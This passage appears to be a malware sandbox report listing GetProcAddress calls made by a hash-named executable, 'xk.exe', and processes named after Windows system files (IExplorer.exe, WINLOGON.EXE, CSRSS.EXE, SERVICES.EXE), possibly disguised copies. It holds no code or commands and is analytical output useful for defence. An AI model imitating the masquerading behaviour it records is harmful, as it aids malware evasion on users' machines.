\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005328)\n \"xk.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter OleLoadPictureEx (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter DispCallFunc (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter LoadTypeLibEx (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter UnRegisterTypeLib (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CreateTypeLib2 (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarDateFromUdate (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarUdateFromDate (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetAltMonthNames (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarNumFromParseNum (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarParseNumFromStr (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarDecFromR4 (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarDecFromR8 (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarDecFromDate (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarDecFromI4 (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarDecFromCy (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarR4FromDec (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetRecordInfoFromTypeInfo (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetRecordInfoFromGuids (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetRecordInfo (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SafeArraySetRecordInfo (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetIID (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SafeArraySetIID (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SafeArrayCopyData (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SafeArrayAllocDescriptorEx (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SafeArrayCreateEx (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarFormat (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarFormatDateTime (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarFormatNumber (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarFormatPercent (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarFormatCurrency (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarWeekdayName (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarMonthName (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarCat (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarEqv (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarImp (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarPow (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarAbs (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarFix (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarInt (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarRound (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarDecAdd (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarDecCmp (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarBstrCat (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarCyMulI4 (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter VarBstrCmp (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter CLSIDFromProgIDEx (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32MapIIDOrCLSIDToTypeLibrary (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter MonitorFromRect (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter MonitorFromPoint (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00003688)\n \"xk.exe\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00003688)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005180)\n \"IExplorer.exe\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00005180)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter OleLoadPictureEx (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter DispCallFunc (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter LoadTypeLibEx (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter UnRegisterTypeLib (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter CreateTypeLib2 (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarDateFromUdate (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarUdateFromDate (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter GetAltMonthNames (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarNumFromParseNum (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarParseNumFromStr (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarDecFromR4 (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarDecFromR8 (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarDecFromDate (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarDecFromI4 (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarDecFromCy (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarR4FromDec (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter GetRecordInfoFromTypeInfo (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter GetRecordInfoFromGuids (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter SafeArrayGetRecordInfo (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter SafeArraySetRecordInfo (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter SafeArrayGetIID (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter SafeArraySetIID (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter SafeArrayCopyData (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter SafeArrayAllocDescriptorEx (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter SafeArrayCreateEx (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarFormat (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarFormatDateTime (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarFormatNumber (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarFormatPercent (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarFormatCurrency (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarWeekdayName (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarMonthName (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarCat (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarEqv (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarImp (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarPow (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarAbs (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarFix (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarInt (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarRound (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarDecAdd (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarDecCmp (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarBstrCat (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarCyMulI4 (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter VarBstrCmp (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter CLSIDFromProgIDEx (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter SxsOleAut32MapIIDOrCLSIDToTypeLibrary (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter MonitorFromRect (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter MonitorFromPoint (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004256)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter MonitorFromRect (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter MonitorFromPoint (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005476)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"GetProcAddress\" with a parameter 